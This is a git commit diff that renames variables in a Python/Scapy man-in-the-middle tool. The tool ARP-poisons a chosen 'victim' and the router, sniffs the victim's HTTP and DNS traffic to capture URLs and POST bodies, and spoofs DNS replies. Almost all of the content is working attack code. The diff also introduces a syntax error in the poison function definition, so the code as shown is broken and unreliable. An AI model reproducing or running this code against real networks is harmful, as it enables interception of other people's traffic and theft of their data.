fixed some var names

This commit is contained in:
DanMcInerney 2013-06-29 15:55:03 -06:00
parent 31f7bb58cf
commit 307d4d5d5b

View file

@ -70,7 +70,7 @@ dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/
chr(DHCPRevOptions["name_server"][0]), chr(DHCPRevOptions["name_server"][0]),
), "end"])) ), "end"]))
ans, unans = srp(dhcp, timeout=5, retry=1) ans, unans = srp(dhcp, timeout=6, retry=1)
if ans: if ans:
for s,r in ans: for s,r in ans:
DHCPopt = r[0][DHCP].options DHCPopt = r[0][DHCP].options
@ -90,13 +90,13 @@ else:
local_domain = 'None' local_domain = 'None'
if args.ipaddress: if args.ipaddress:
VICTIMIP = args.ipaddress victimIP = args.ipaddress
else: else:
ans,unans = arping(IPprefix+'*') ans,unans = arping(IPprefix+'*')
for s,r in ans: for s,r in ans:
ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%") ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
print ips print ips
VICTIMIP = raw_input('\nType victim\'s IP: ') victimIP = raw_input('\nType victim\'s IP: ')
print '' print ''
print "[+] Active interface: " + interface print "[+] Active interface: " + interface
@ -106,7 +106,7 @@ print "[+] DHCP server: " + DHCPsrvr
print "[+] DNS server: " + DNSsrvr print "[+] DNS server: " + DNSsrvr
print "[+] Local domain: " + local_domain print "[+] Local domain: " + local_domain
print "[+] Router IP: " + routerIP print "[+] Router IP: " + routerIP
print "[+] Client IP: " + VICTIMIP print "[+] Client IP: " + victimIP
def originalMAC(ip): def originalMAC(ip):
# srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP # srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP
@ -114,18 +114,18 @@ def originalMAC(ip):
for s,r in ans: for s,r in ans:
return r.sprintf("%Ether.src%") return r.sprintf("%Ether.src%")
def poison(routerIP, VICTIMIP): def poisonrouterIP, victimIP):
send(ARP(op=2, pdst=VICTIMIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff")) send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff"))
send(ARP(op=2, pdst=routerIP, psrc=VICTIMIP, hwdst="ff:ff:ff:ff:ff:ff")) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff"))
def restore(routerIP, VICTIMIP, routerMAC, VICTIMMAC): def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=VICTIMIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=VICTIMMAC), count=3) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=VICTIMIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3) send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
def URL(pkt): def URL(pkt):
global host, get, post, url global host, get, post, url
if pkt.haslayer(Raw) and pkt[Ether].src == VICTIMMAC: if pkt.haslayer(Raw) and pkt[Ether].src == victimMAC:
pkt = repr(pkt[Raw].load) pkt = repr(pkt[Raw].load)
try: try:
headers, body = pkt.split(r"\r\n\r\n") headers, body = pkt.split(r"\r\n\r\n")
@ -250,16 +250,16 @@ class urlspy(threading.Thread):
def run(self): def run(self):
# This is in case you need to test the program without an actual victim # This is in case you need to test the program without an actual victim
# sniff(store=0, filter='port 80', prn=URL, iface=interface) # sniff(store=0, filter='port 80', prn=URL, iface=interface)
sniff(store=0, filter='port 80 and host %s' % VICTIMIP, prn=URL, iface=interface) sniff(store=0, filter='port 80 and host %s' % victimIP, prn=URL, iface=interface)
class dnsspy(threading.Thread): class dnsspy(threading.Thread):
def run(self): def run(self):
sniff(store=0, filter='port 53 and host %s' % VICTIMIP, prn=DNSreq, iface=interface) sniff(store=0, filter='port 53 and host %s' % victimIP, prn=DNSreq, iface=interface)
class dnsspoof(threading.Thread): class dnsspoof(threading.Thread):
def run(self): def run(self):
while 1: while 1:
a=sniff(filter='port 53 or port 80 and host %s' % VICTIMIP, count=1, promisc=1) a=sniff(filter='port 53 or port 80 and host %s' % victimIP, count=1, promisc=1)
DNSpkt = a[0] DNSpkt = a[0]
if not DNSpkt.haslayer(DNSQR): if not DNSpkt.haslayer(DNSQR):
continue continue
@ -280,8 +280,8 @@ class driftnet(threading.Thread):
try: try:
routerMAC = originalMAC(routerIP) routerMAC = originalMAC(routerIP)
print "[+] Router MAC: " + routerMAC print "[+] Router MAC: " + routerMAC
VICTIMMAC = originalMAC(VICTIMIP) victimMAC = originalMAC(victimIP)
print "[+] Victim MAC: " + VICTIMMAC + "\n" print "[+] Victim MAC: " + victimMAC + "\n"
except: except:
sys.exit("Could not get MAC addresses") sys.exit("Could not get MAC addresses")
@ -323,8 +323,8 @@ def main():
def signal_handler(signal, frame): def signal_handler(signal, frame):
print 'learing iptables, sending healing packets, and turning off IP forwarding...' print 'learing iptables, sending healing packets, and turning off IP forwarding...'
restore(routerIP, VICTIMIP, routerMAC, VICTIMMAC) restore(routerIP, victimIP, routerMAC, victimMAC)
restore(routerIP, VICTIMIP, routerMAC, VICTIMMAC) restore(routerIP, victimIP, routerMAC, victimMAC)
bash('echo 0 > /proc/sys/net/ipv4/ip_forward') bash('echo 0 > /proc/sys/net/ipv4/ip_forward')
bash('iptables -t nat -F') bash('iptables -t nat -F')
bash('iptables -F') bash('iptables -F')
@ -336,9 +336,9 @@ def main():
while 1: while 1:
poison(routerIP, VICTIMIP) poison(routerIP, victimIP)
if not DNSsrvr == routerIP: if not DNSsrvr == routerIP:
poison(DNSsrvr, VICTIMIP) poison(DNSsrvr, victimIP)
time.sleep(1.5) time.sleep(1.5)